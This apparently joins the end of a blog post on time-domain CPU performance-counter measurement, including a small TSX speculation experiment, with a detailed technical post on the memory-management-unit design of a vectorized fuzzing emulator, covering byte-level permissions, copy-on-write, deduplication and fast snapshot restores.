; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  48C7042500000000  mov qword [0x0],0x0
         -00000000
0000001D  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000029  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000035  48C7042500000000  mov qword [0x0],0x0
         -00000000

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000041  B98F030000        mov ecx,0x38f
00000046  31C0              xor eax,eax
00000048  31D2              xor edx,edx
0000004A  0F30              wrmsr

Here we’re just going to write to NULL 4 times. This might sound bad, but in this example I mapped NULL in as normal write-back memory. Nothing crazy, just treat it as a valid address.

But here are the results:

Noise Sample

Hmmm… we have error bars! We see the stores always get dispatched at the same time. This makes sense, we’re always doing the same thing. But we see that some of the instructions have some variance in where they retire. For example, at cycle=38 we see that sometimes at this point 2 instructions have been retired, other times 4 have been retired, but on average a little over 3 instructions have been retired at this point. This tells us that the CPU isn’t always deterministic in this environment.

These results can get a bit more complex to interpret, but it’s still relevant data nevertheless. Changing the code under test, cleaning up to the environment to be more determinsitic, etc, can often improve the quality and visibility of the data.

Does it work with speculation?

Damn right it does! That was the whole point!

Let’s cause a fault, perform some loads behind it, and see if we can see the loads get issued even though the entire section of code is discarded.

    // Start a TSX section, think of this as a `try {` block
    xbegin 2f

    // Read from -1, causing a fault
    mov rax, [-1]

    // Here's some loads shadowing the faulting load. These
    // should never occur, as the instruction above causes
    // an exeception and thus execution should "jump" to the label `2:`

    .rept 32
        // Repeated load 32 times
        mov rbx, [0]
    .endr

    // End the TSX section, think of this as a `}` closing the
    // `try` block
    xend

2:
    // Here is where execution goes if the TSX section had
    // an exception, and thus where execution will flow

Speculation Sample

Both ports 2 and port 3 are load ports. We see both of them taking turns handling loads (1 load per cycle each, with 2 ports, 2 loads per cycle total). Here we can see many different loads get dispatched, even though very few instructions actually retire. What we’re viewing here is the micro-architecture performing speculation! Neat!

More data?

I could go on and on graphing different CPU behaviors! There’s so much cool stuff to explore out there. However, this blog has already gotten longer than I wanted, so I’ll stop here. Maybe I’ll make future small blogs about certain interesting behaviors!


Conclusion

This technique of measuring performance counters on a time-domain seems to work quite well. You have to be very careful with noise, but with careful interpretation of the data, this technique provides the highest level of visibility into the Intel micro-architecture that I’ve ever seen!

This tool is incredibly useful for validating hypothesises about behaviors of various Intel micro-architectures. By running multiple experiments on different behaviors, a more macro-level model can be derived about the inner workings of the CPU. This could lead to learning new optimization techniques, finding new CPU vulnerabilities, and just in general having fun learning how things work!


Source?

Update: 8/19/2019

This kernel has too many sensitive features that I do not want to make public at this time…

However, it seems there’s a lot of interest in this tech, so I will try to live stream soon adding this functionality to my already-open-source kernel Orange Slice!


Vectorized Emulation: MMU Design

19 November 2018 at 19:10

Softserve

New vectorized emulator codenamed softserve

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up.

Check out the intro

This is the continuation of a multipart series. See the introduction post here

This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!

Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!

The code

This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found here. I have no plans to open source the vectorized emulator and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further this code is not buildable as I’m not open sourcing my assembler, however I assume the syntax is pretty obvious and can be read as pseudocode.

By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.

It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the correct operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.

Intro

Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further the MMU design used here also is designed to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has it’s own permission bits. Since vectorized emulation is meant for fuzzing it’s also important that the memory state can quickly be restored to the original state quickly so a new fuzz iteration can be started.

During this blog we introduce a few big concepts:

  • Differential restores
  • Byte-level permissions
  • Read-after-write memory (uninitialized memory tracking)
  • Gage fuzzing
  • Aliased/CoW memory
  • Deduplicated memory
  • Technical details about the IL relevant to the MMU
  • Painful details about everything

Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges 0xffff... and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, where things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.

The problem

Before we get into describing the solution, let’s address what the problem is in the first place!

When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access it’s own memory, and it isn’t overwriting the emulator’s memory itself. To do this there are multiple traditional solutions:

  • Restrict the address space of the guest such that it can fit entirely in the emulator’s address space
  • Use a data structure to emulate a sparse guest’s memory space
  • Create a new process/VM with only the guest’s memory mapped in

The first solution is the simplest, fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via mmap or VirtualProtect. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space 0xffff... and beyond. This memory is typically reserved for the kernel. This is the model used by things like qemu-user as it is super fast and works great for well-behaving userland applications. By setting the QEMU_GUEST_BASE environment variable you can change this base and set the size with QEMU_RESERVED_VA.

The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.

The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table models for a VM. This will make the emulator tied to an architecture, might require a driver, and like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section


History

Feel free to skip this section if you don’t care about context

To give some background on how we ended up where we ended up it’s important to go through the background of the MMU designs used in the past. Note that the generations aren’t the same MMU improving, it’s just different MMUs I’ve designed over time.

First generation

The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system level target so I was not using qemu-user, but rather qemu-system. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory to save time during reset time. This had a huge improvement for my hypervisor so it was natural for me to just copy it over the QEMU so I could get the same benefits.

Second generation

While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my target was MIPS32 and ARM32) using 8-bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages and allowed me to reset more specific dirty pages and reduces the overall work for resets.

Third generation

At this point I was tinkering around with different page table shapes to find which worked fast. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like malloc(). By setting permissions directly to the size actually requested by malloc() we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.

Fourth generation

I ended up designing my own emulator for MIPS32, performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.

At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.

For example if the guest wanted to access address 0x13370000, it would just directly dereference the memory at 0x1337000. No translation, not base applied, simple.

You can see this code in the srcs/emu folder in falkervisor.

I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VM’s memory.

Fifth generation

The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve it’s ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would be all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).

Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what qemu-user does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.

Sixth generation

The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down as they blocked until the OS cleaned up their resources. Further commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design….


Page Tables

Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.

Page table

In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as [9, 9, 9, 9, 12] according to my dynamic paging model. This syntax will be explained later.

For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.

Here’s the actual metadata of a 4 KiB page on 64-bit Intel:

Page table metadata


The overall design

My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.

When designing the new MMU there were a few critical features it needed:

  • Byte level permissions
  • Fast snapshot/restore times
  • A data structure that could be quickly traversed in JIT
  • Quick process start times
  • The ability to handle full 64-bit address spaces
  • Low memory usage (we need to run 2048 VMs)
  • Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)
  • Must be easily tested for correctness
  • Ability to track uninitialized memory at a byte-level
  • Read-only memory shared between all cores

Applying byte-level permissions

So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?

Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.

The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.

We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap does not provide the requested size then this is not possible. Further allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.

To remedy these problems there a few solutions. We can use page heap in the application we’re taking a snapshot in, which will always ensure we have a page after the allocation we can play with for guard bytes. Further page heap has the requested size in the metadata so we can get perfect byte-level applied.

If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.

Getting even fancier

When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.


Design features

Basics of the vectorized model

This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.

Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VM’s memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However the common case most memory is accessed at the same address, and memory does not straddle a 8-byte boundary. It’s worth it.

For reference the cost of a single load instruction vmovdqa64 is about 4-5 cycles, where a vpgatherqq load is 20-30 cycles. Unless memory is so frequently accessed from different addresses and straddling 8-byte boundaries it is always worth interleaving.

VM interleaving looks as follows:

chart simplified to show 4 lanes instead of 8

Guest Address Host Address Qword 1 Qword 2 Qword 3 Qword 8
0x0000 0x0000 1 2 3 33
0x0008 0x0040 32 74 55 45
0x0010 0x0080 24 24 24 24

This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte value things get quite slow but this is a rare case and we’re not too concerned about it.

How do we build a testable model?

To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naive as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needing for modifying memory or permissions they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!

64-bit address spaces

To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.

Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called PAGE_TABLE_LAYOUT. This is used in reality in the form: const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];.

This array defines the number of bits used for translating each level in the page table, and PAGE_TABLE_DEPTH sets the number of levels in the page table. In the example above this shows that we use the top 16-bits for the first level as the index, the next 16-bits for the next level, the next 16-bits again for another level, a 13-bit level, and finally a 3-bit page size. As long as this PAGE_TABLE_LAYOUT adds up to 64-bits, contains at least 2 entries (1 level page table), and at least has a final translation size of 8-byte (like in the example), the MMU and JITs will be updated. This allows profiling to be done of a specific target and modify the page table to whatever shape works best. This also allows for changes between performance and memory usage if needed.

Fast restores

When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table, if it was accessed I would recurse to the next level, otherwise skip it, at the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.

To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.

Instead of walking page tables I just now append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. This was a decision driven by actual data on real targets, it’s much faster.

If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.

Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called Page Modification Logging). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.

Permissions

On classic x86 (and really any other architecture) permissions bits are added at each level of the page table. This allows for the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VM’s at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte for each VM.

Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.

There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.

In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.

In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to the permissions and memory contents. Further in memory the permissions come first followed by the contents. Since permissions are checked first this allows for the memory to be accessed linearally and potentially get a speedup by the hardware prefetchers.

When permissions and contents are laid out in a pretty format it looks something like:

Simplified to 4 lanes instead of 8 MMU layout

We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.

Uninitialized memory tracking

To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.

On all writes to memory the RaW it is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than have a conditional operation.

Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. malloc()ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!


Gage fuzzing

Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of the pointer to read-after-write as well.

As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.

This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.

This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!

I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.


Theory into practice

So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.

We’ve got a few things that could make this hard to JIT. First of all performance is going to be an issue, we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.

64-bit saves the day

Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.

Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.

In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.

Handling non-present pages

Typically in most architectures there is a present bit used in the page tables to indicate that an entry is present. This really just allows them to map in the physical address NULL in page tables. Since we’re running as a user application using virtual addresses we cheat and just use the pointers for page table entries.

If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.

What is a page fault?

In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a ret allows us to exit from the emulator at any time.

Further since it’s possible VMs could have different permissions or page tables, we report a caused_vmexit mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.

Memory costs

Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.

Saving time and memory

We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This mean it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process. Even with a hard ctrl+c.

To remedy this, everything we do is lazy. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.

VMs have no memory to start off

When a VM launches it has zero memory in it’s MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.

So where does memory come from?

Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.

We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.

This has the awesome effect of only memory that is ever touched is brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, eg. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your hearts desire.

Sharing memory / forking

Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.

We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.

When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.

When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an aliased bit on the last level page table, next to the dirty bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.

To allow for writes to the VM we add another bit to the last level page tables, a cow, or copy-on-write, bit. This is always accompanied with the aliased bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.

An example in aliased/CoWed memory access

This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.

  • An empty master MMU is created
  • An exception handler is added to the master MMU that faults in pages from the disk on-demand
  • A child is forked from the master
  • A read occurs to a page in the child
  • This causes an exception in the child as it has no memory
  • The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page
  • The master has no memory for this page and causes an exception
  • The master’s exception handler handles loading the page from disk, creating an entry
  • The master returns out with exception handled
  • The child directly links in the master’s page as aliased
  • Child returns with no exception
  • Child then dispatches a write to the same memory
  • The page is marked as aliased and thus cannot be written to
  • A copy of the master’s page is made
  • The permissions are checked in the page for write-access for all bytes being written to
  • The write occurs in the child-owned page
  • Success

While this is quite slow for the initial access, the child maintains it’s CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.

The overall result of this model is that memory only is ever read from disk if ever used, it then is only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.

In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but increases performance.

All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.

This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.

Deduplicated memory

Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!

Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.

This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the the master, we can instead maintain a HashSet of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated HashSet, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this HashSet with the aliased bit set. Since pages contain the permissions this automatically handles creating different copies of the same memory with different permissions

Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other aliased memory, it can be cow memory and cloned if modified.

The gain from this is minimal in practice, but the code complexity increase given we already handle cow and aliased memory is so little that there’s really no reason to not do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.

For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.

cow_and_dedup


Performance

Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.

There are two important aspects to performance:

  • The JIT
  • Injecting fuzz cases / allocating memory

The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible from bringing our best case 2 trillion instructions/second benchmark to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.

Next we have the maybe-not-so-obvious performance-critical aspect. Getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).

Further the VM may dynamically allocate memory via malloc() which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times a fuzz case, so this could result in potentially tens of millions of MMU modifications per second.

The JIT / IL

We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.

When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.

Differing addresses

Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).

Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.

The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.

We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty. As it’s guaranteed to not be aliased if it’s dirty.

Vectorized translation

However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.

To handle translations failing at different points, we mask off VMs as they fail at various points. At the end of the translation we determine if any VM failed, and if it did we can report the failure correctly for all VM’s that failed at any point during the translation. This allows us to get a correct caused_vmexit mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.

Vectorized dirty list updating

Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.

To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.

However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.

IL MMU routines

I’m going to have a whole blog on my IL, but it’s a simple SSA IL.

